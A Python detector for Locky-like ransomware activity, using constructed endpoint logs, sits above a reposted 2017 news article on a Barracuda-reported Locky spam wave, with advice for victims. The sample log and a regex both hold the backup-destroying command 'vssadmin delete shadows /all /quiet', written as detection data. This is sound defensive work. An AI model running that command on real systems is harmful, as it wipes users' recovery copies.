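```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed endpoint telemetry (not real logs): "<iso-time> <host> <type> <detail>".
SAMPLE_EVENTS = """\
2017-09-18T09:01:09 ws-12 rename C:\\Users\\a\\Docs\\report.docx -> C:\\Users\\a\\Docs\\A1B2C3D4E5F60718.locky
2017-09-18T09:01:09 ws-12 rename C:\\Users\\a\\Docs\\budget.xlsx -> C:\\Users\\a\\Docs\\A1B2C3D4E5F60719.locky
2017-09-18T09:01:10 ws-12 rename C:\\Users\\a\\Docs\\notes.txt -> C:\\Users\\a\\Docs\\A1B2C3D4E5F6071A.locky
2017-09-18T09:01:10 ws-12 rename C:\\Users\\a\\Docs\\photo.jpg -> C:\\Users\\a\\Docs\\A1B2C3D4E5F6071B.locky
2017-09-18T09:01:11 ws-12 rename C:\\Users\\a\\Docs\\plan.pptx -> C:\\Users\\a\\Docs\\A1B2C3D4E5F6071C.locky
2017-09-18T09:01:12 ws-12 process vssadmin.exe delete shadows /all /quiet
2017-09-18T09:05:00 ws-07 rename C:\\Users\\b\\draft.txt -> C:\\Users\\b\\final.txt
2017-09-18T09:06:00 ws-07 rename C:\\Users\\b\\old.locky -> C:\\Users\\b\\old.bak
"""

EVENT_RE = re.compile(r"^(\S+) (\S+) (process|rename) (.*)$")
# Shadow-copy removal via vssadmin is the backup-deletion behaviour described above (assumed log form).
SHADOW_RE = re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows", re.IGNORECASE)

def parse_events(text):
    """Yield (time, host, kind, detail) tuples, skipping malformed lines."""
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if m:
            yield datetime.fromisoformat(m.group(1)), m.group(2), m.group(3), m.group(4)

def detect_locky(text, rename_threshold=5, window_seconds=60):
    """Return {host: [findings]} for hosts showing Locky-like behaviour."""
    locky_renames = defaultdict(list)  # host -> timestamps of renames *to* .locky
    findings = defaultdict(list)
    for ts, host, kind, detail in parse_events(text):
        if kind == "rename" and detail.lower().endswith(".locky"):
            locky_renames[host].append(ts)
        elif kind == "process" and SHADOW_RE.search(detail):
            findings[host].append("shadow copies deleted (backup removal)")
    for host, times in locky_renames.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):  # sliding window over sorted timestamps
            while (t - times[start]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= rename_threshold:
                findings[host].append(f"{end - start + 1} files renamed to .locky within {window_seconds}s")
                break
    return dict(findings)

if __name__ == "__main__":
    for host, hits in detect_locky(SAMPLE_EVENTS).items():
        print(host, hits)
```

A rename away from “.locky” (ws-07 restoring a file) is deliberately not counted, so only hosts with a burst of new “.locky” files or a shadow-copy deletion are flagged.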

Believed to be released by the same hackers who were behind Dridex ransomware in 2015, Locky has been spreading like wildfire across the web in 2017, evolving every now and then with new, sneaky distribution methods.

Just last month, it was revealed that a new version of Locky attacked millions of systems in just one day.

Locky’s Back With New Aggressive Variant

The threat, according to researchers at Barracuda Networks Advanced Technology Group, comes in the form of a new, very aggressive version of the ransomware strain known as Locky.

Per a Barracuda blog post, the attacks originate predominantly from Vietnam, but hotbeds include other countries across three continents, like India, Turkey, Colombia, and Greece, albeit in very low volumes as compared to those from Vietnam.

Barracuda analysts say that about 20 million of these attacks occurred in 24 hours, from the 18th to the 19th of September, and this figure was growing rapidly. Most of the spam emails claim to be from the “Herbalife company” or fake “copier file delivery”.

In an update, Barracuda said its researchers confirmed that the attacks use a variant of the Locky ransomware with a unique identifier. Identifiers are supposed to let hackers ID victims in order to send them tools to decrypt data after the ransom is paid.

This time, however, all victims have been assigned the same identifier, which means that even if victims pay the ransom they won’t receive decryption tools.

Barracuda also said its filters had blocked about 27 million Locky-related emails, adding that its researchers are actively monitoring the situation.

EdgyLabs readers, here’s what you can do if you fall victim to a Locky or other ransomware attack:

Whatever you do, don’t pay the ransom, because paying cybercriminals amounts to feeding their behavior, unless of course there’s no other way to get your “critical” data back.

But in the case of this new wave of Locky attacks, as security researchers found out (same ID for all victims), just don’t bother, because you’re not getting decryption tools anyway, whether the ransom is paid or not.

You can remove Locky ransomware using your average antivirus program. You can try to recover your encrypted data by restoring backup copies, but that’s not guaranteed with the new strain of Locky that deletes shadow copies.

Besides updating your antivirus and using spam filters, in the case of ransomware, remember not to open attachments from suspicious emails of unverified origin; delete them instead.

But before all of that, make sure you use 3-2-1 data protection.

Use 3-2-1 Data Protection

3 copies of your data
2 separate types of media (tape, disk, deduplication)
1 offline and off-site copy

As always, whenever a hard drive is compromised, it’s best to reformat the drive completely before using it again in the future.

The post 20 Million Confirmed #Attacks in 24 Hours: #Locky and Other #Ransomware appeared first on National Cyber Security Ventures.
